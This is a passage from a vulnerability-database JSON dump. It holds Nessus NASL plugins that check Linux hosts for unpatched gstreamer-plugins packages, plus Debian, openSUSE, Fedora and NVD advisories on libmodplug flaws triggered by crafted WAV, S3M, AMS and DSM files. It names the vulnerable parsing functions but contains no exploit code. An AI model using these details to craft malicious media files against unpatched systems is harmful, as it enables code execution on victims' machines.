script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2011:1264 :\n\nUpdated gstreamer-plugins packages that fix multiple security issues\nare now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe gstreamer-plugins packages contain plug-ins used by the GStreamer\nstreaming-media framework to support a wide variety of media formats.\n\nAn integer overflow flaw, a boundary error, and multiple off-by-one\nflaws were found in various ModPlug music file format library\n(libmodplug) modules, embedded in GStreamer. An attacker could create\nspecially crafted music files that, when played by a victim, would\ncause applications using GStreamer to crash or, potentially, execute\narbitrary code. (CVE-2011-2911, CVE-2011-2912, CVE-2011-2913,\nCVE-2011-2914, CVE-2011-2915)\n\nAll users of gstreamer-plugins are advised to upgrade to these updated\npackages, which contain backported patches to correct these issues.\nAfter installing the update, all applications using GStreamer (such as\nRhythmbox) must be restarted for the changes to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2011-September/002347.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected gstreamer-plugins packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:gstreamer-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:gstreamer-plugins-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/06/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"gstreamer-plugins-0.8.5-1.0.1.EL.4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"gstreamer-plugins-devel-0.8.5-1.0.1.EL.4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gstreamer-plugins / gstreamer-plugins-devel\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T13:46:02", "description": "The gstreamer-plugins packages contain plug-ins used by the GStreamer\nstreaming-media framework to support a wide variety of media formats.\n\nAn integer overflow flaw, a boundary error, and multiple off-by-one\nflaws were found in various ModPlug music file format library\n(libmodplug) modules, embedded in GStreamer. An attacker could create\nspecially crafted music files that, when played by a victim, would\ncause applications using GStreamer to crash or, potentially, execute\narbitrary code. (CVE-2011-2911, CVE-2011-2912, CVE-2011-2913,\nCVE-2011-2914, CVE-2011-2915)\n\nAll users of gstreamer-plugins are advised to upgrade to these updated\npackages, which contain backported patches to correct these issues.\nAfter installing the update, all applications using GStreamer (such as\nRhythmbox) must be restarted for the changes to take effect.", "edition": 24, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : gstreamer-plugins on SL4.x i386/x86_64", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2012-08-01T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20110906_GSTREAMER_PLUGINS_ON_SL4_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61131", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61131);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-2911\");\n\n script_name(english:\"Scientific Linux Security Update : gstreamer-plugins on SL4.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The gstreamer-plugins packages contain plug-ins used by the GStreamer\nstreaming-media framework to support a wide variety of media formats.\n\nAn integer overflow flaw, a boundary error, and multiple off-by-one\nflaws were found in various ModPlug music file format library\n(libmodplug) modules, embedded in GStreamer. An attacker could create\nspecially crafted music files that, when played by a victim, would\ncause applications using GStreamer to crash or, potentially, execute\narbitrary code. (CVE-2011-2911, CVE-2011-2912, CVE-2011-2913,\nCVE-2011-2914, CVE-2011-2915)\n\nAll users of gstreamer-plugins are advised to upgrade to these updated\npackages, which contain backported patches to correct these issues.\nAfter installing the update, all applications using GStreamer (such as\nRhythmbox) must be restarted for the changes to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1109&L=scientific-linux-errata&T=0&P=1260\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f7838f47\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected gstreamer-plugins, gstreamer-plugins-debuginfo and\n/ or gstreamer-plugins-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL4\", reference:\"gstreamer-plugins-0.8.5-1.EL.4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"gstreamer-plugins-debuginfo-0.8.5-1.EL.4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"gstreamer-plugins-devel-0.8.5-1.EL.4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:27:16", "description": "Updated gstreamer-plugins packages that fix multiple security issues\nare now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe gstreamer-plugins packages contain plug-ins used by the GStreamer\nstreaming-media framework to support a wide variety of media formats.\n\nAn integer overflow flaw, a boundary error, and multiple off-by-one\nflaws were found in various ModPlug music file format library\n(libmodplug) modules, embedded in GStreamer. An attacker could create\nspecially crafted music files that, when played by a victim, would\ncause applications using GStreamer to crash or, potentially, execute\narbitrary code. (CVE-2011-2911, CVE-2011-2912, CVE-2011-2913,\nCVE-2011-2914, CVE-2011-2915)\n\nAll users of gstreamer-plugins are advised to upgrade to these updated\npackages, which contain backported patches to correct these issues.\nAfter installing the update, all applications using GStreamer (such as\nRhythmbox) must be restarted for the changes to take effect.", "edition": 25, "published": "2011-09-09T00:00:00", "title": "CentOS 4 : gstreamer-plugins (CESA-2011:1264)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2011-09-09T00:00:00", "cpe": ["cpe:/o:centos:centos:4", "p-cpe:/a:centos:centos:gstreamer-plugins", "p-cpe:/a:centos:centos:gstreamer-plugins-devel"], "id": "CENTOS_RHSA-2011-1264.NASL", "href": "https://www.tenable.com/plugins/nessus/56126", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2011:1264 and \n# CentOS Errata and Security Advisory 2011:1264 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56126);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_bugtraq_id(48979);\n script_xref(name:\"RHSA\", value:\"2011:1264\");\n\n script_name(english:\"CentOS 4 : gstreamer-plugins (CESA-2011:1264)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated gstreamer-plugins packages that fix multiple security issues\nare now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe gstreamer-plugins packages contain plug-ins used by the GStreamer\nstreaming-media framework to support a wide variety of media formats.\n\nAn integer overflow flaw, a boundary error, and multiple off-by-one\nflaws were found in various ModPlug music file format library\n(libmodplug) modules, embedded in GStreamer. An attacker could create\nspecially crafted music files that, when played by a victim, would\ncause applications using GStreamer to crash or, potentially, execute\narbitrary code. (CVE-2011-2911, CVE-2011-2912, CVE-2011-2913,\nCVE-2011-2914, CVE-2011-2915)\n\nAll users of gstreamer-plugins are advised to upgrade to these updated\npackages, which contain backported patches to correct these issues.\nAfter installing the update, all applications using GStreamer (such as\nRhythmbox) must be restarted for the changes to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2011-September/017719.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?da8aed77\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2011-September/017720.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?50d39208\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected gstreamer-plugins packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gstreamer-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gstreamer-plugins-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/06/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/09/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 4.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"gstreamer-plugins-0.8.5-1.EL.4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"gstreamer-plugins-0.8.5-1.EL.4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"gstreamer-plugins-devel-0.8.5-1.EL.4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"gstreamer-plugins-devel-0.8.5-1.EL.4\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gstreamer-plugins / gstreamer-plugins-devel\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2016-09-04T11:29:41", "bulletinFamily": "unix", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-1761", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "description": "This update of libmodplug0 fixes the following issues:\n\n 1) An integer overflow error exists within the\n "CSoundFile::ReadWav()" function (src/load_wav.cpp) when\n processing certain WAV files. This can be exploited to\n cause a heap-based buffer overflow by tricking a user into\n opening a specially crafted WAV file. (CVE-2011-2911)\n\n 2) Boundary errors within the "CSoundFile::ReadS3M()"\n function (src/load_s3m.cpp) when processing S3M files can\n be exploited to cause stack-based buffer overflows by\n tricking a user into opening a specially crafted S3M file.\n (CVE-2011-2912)\n\n\n 3) An off-by-one error within the "CSoundFile::ReadAMS()"\n function (src/load_ams.cpp) can be exploited to cause a\n stack corruption by tricking a user into opening a\n specially crafted AMS file. (CVE-2011-2913)\n\n 4) An off-by-one error within the "CSoundFile::ReadDSM()"\n function (src/load_dms.cpp) can be exploited to cause a\n memory corruption by tricking a user into opening a\n specially crafted DSM file. (CVE-2011-2914)\n\n 5) An off-by-one error within the "CSoundFile::ReadAMS2()"\n function (src/load_ams.cpp) can be exploited to cause a\n memory corruption by tricking a user into opening a\n specially crafted AMS file. (CVE-2011-2915)\n\n Also an overflow in the ABC loader was fixed.\n (CVE-2011-1761)\n\n", "edition": 1, "modified": "2011-08-24T21:08:24", "published": "2011-08-24T21:08:24", "id": "OPENSUSE-SU-2011:0943-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2011-08/msg00019.html", "title": "libmodplug: Fixed multiple vulnerabilities reported in <= 0.8.8.3 (important)", "type": "suse", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2020-11-11T13:20:14", "bulletinFamily": "unix", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-1761", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2415-1 security@debian.org\nhttp://www.debian.org/security/ Nico Golde\nFebruary 21, 2012 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : libmodplug\nVulnerability : several\nProblem type : local\nDebian-specific: no\nCVE ID : CVE-2011-1761 CVE-2011-2911 CVE-2011-2912 CVE-2011-2913\n CVE-2011-2914 CVE-2011-2915\n\nSeveral vulnerabilities that can lead to the execution of arbitrary code\nhave been discovered in libmodplug, a library for mod music based on\nModPlug. The Common Vulnerabilities and Exposures project identifies\nthe following issues:\n\nCVE-2011-1761\n\n epiphant discovered that the abc file parser is vulnerable to several\n stack-based buffer overflows that potentially lead to the execution\n of arbitrary code.\n\nCVE-2011-2911\n\n Hossein Lotfi of Secunia discovered that the CSoundFile::ReadWav\n function is vulnerable to an integer overflow which leads to a\n heap-based buffer overflow. An attacker can exploit this flaw to\n potentially execute arbitrary code by tricking a victim into opening\n crafted WAV files.\n\nCVE-2011-2912\n\n Hossein Lotfi of Secunia discovered that the CSoundFile::ReadS3M\n function is vulnerable to a stack-based buffer overflow. An attacker\n can exploit this flaw to potentially execute arbitrary code by\n tricking a victim into opening crafted S3M files.\n\nCVE-2011-2913\n\n Hossein Lotfi of Secunia discovered that the CSoundFile::ReadAMS\n function suffers from an off-by-one vulnerability that leads to \n memory corruption. An attacker can exploit this flaw to potentially\n execute arbitrary code by tricking a victim into opening crafted AMS\n files.\n\nCVE-2011-2914\n\n It was discovered that the CSoundFile::ReadDSM function suffers\n from an off-by-one vulnerability that leads to memory corruption.\n An attacker can exploit this flaw to potentially execute arbitrary\n code by tricking a victim into opening crafted DSM files.\n\nCVE-2011-2915\n\n It was discovered that the CSoundFile::ReadAMS2 function suffers\n from an off-by-one vulnerability that leads to memory corruption.\n An attacker can exploit this flaw to potentially execute arbitrary\n code by tricking a victim into opening crafted AMS files.\n\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1:0.8.8.1-1+squeeze2.\n\nFor the testing (wheezy) and unstable (sid) distributions, this problem\nhas been fixed in version 1:0.8.8.4-1.\n\nWe recommend that you upgrade your libmodplug packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 11, "modified": "2012-02-22T00:06:11", "published": "2012-02-22T00:06:11", "id": "DEBIAN:DSA-2415-1:6A5A5", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2012/msg00042.html", "title": "[SECURITY] [DSA 2415-1] libmodplug security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-11T13:18:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1574"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2226-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nApril 26, 2011 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : libmodplug\nVulnerability : buffer overflow\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2011-1574 \nDebian Bug : 622091\n\nM. Lucinskij and P. Tumenas discovered a buffer overflow in the code for\nprocessing S3M tracker files in the Modplug tracker music library, which \nmay result in the execution of arbitrary code.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 0.8.4-1+lenny2.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1:0.8.8.1-1+squeeze1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1:0.8.8.2-1.\n\nWe recommend that you upgrade your libmodplug packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 7, "modified": "2011-04-26T21:21:08", "published": "2011-04-26T21:21:08", "id": "DEBIAN:DSA-2226-1:EB2E2", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00095.html", "title": "[SECURITY] [DSA 2226-1] libmodplug security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-2911", "CVE-2011-2912", "CVE-2011-2913", "CVE-2011-2915"], "description": "Modplug mod music file format library. ", "modified": "2011-08-22T15:25:03", "published": "2011-08-22T15:25:03", "id": "FEDORA:7589D28259", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: libmodplug-0.8.8.4-1.fc16", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1574", "CVE-2011-1761", "CVE-2011-2911", "CVE-2011-2912", "CVE-2011-2913", "CVE-2011-2915"], "description": "Modplug mod music file format library. ", "modified": "2011-08-17T00:58:10", "published": "2011-08-17T00:58:10", "id": "FEDORA:2D39D110B4E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 14 Update: libmodplug-0.8.8.4-1.fc14", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1761", "CVE-2011-2911", "CVE-2011-2912", "CVE-2011-2913", "CVE-2011-2915"], "description": "Modplug mod music file format library. ", "modified": "2011-08-17T01:20:40", "published": "2011-08-17T01:20:40", "id": "FEDORA:92B48110E1C", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: libmodplug-0.8.8.4-1.fc15", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1574"], "description": "Modplug mod music file format library. ", "modified": "2011-04-17T21:24:11", "published": "2011-04-17T21:24:11", "id": "FEDORA:73F37110CA6", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 14 Update: libmodplug-0.8.8.2-1.fc14", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1574", "CVE-2011-1761"], "description": "Modplug mod music file format library. ", "modified": "2011-05-25T02:24:12", "published": "2011-05-25T02:24:12", "id": "FEDORA:0F99C110FD5", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 14 Update: libmodplug-0.8.8.3-3.fc14", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2020-12-09T19:39:09", "description": "Stack-based buffer overflow in the CSoundFile::ReadS3M function in src/load_s3m.cpp in libmodplug before 0.8.8.4 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a crafted S3M file with an invalid offset.", "edition": 5, "cvss3": {}, "published": "2012-06-07T19:55:00", "title": "CVE-2011-2912", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2912"], "modified": "2017-08-29T01:29:00", "cpe": ["cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.3", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.2", "cpe:/a:konstanty_bialkowski:libmodplug:0.8", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.4", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.7", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.6", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.1", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.5", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8"], "id": "CVE-2011-2912", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-2912", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.7:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.6:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.4:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:39:09", "description": "Off-by-one error in the CSoundFile::ReadAMS2 function in src/load_ams.cpp in libmodplug before 0.8.8.4 allows remote attackers to cause a denial of service (memory corruption) and possibly execute arbitrary code via a crafted AMS file with a large number of instruments.", "edition": 5, "cvss3": {}, "published": "2012-06-07T19:55:00", "title": "CVE-2011-2915", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": 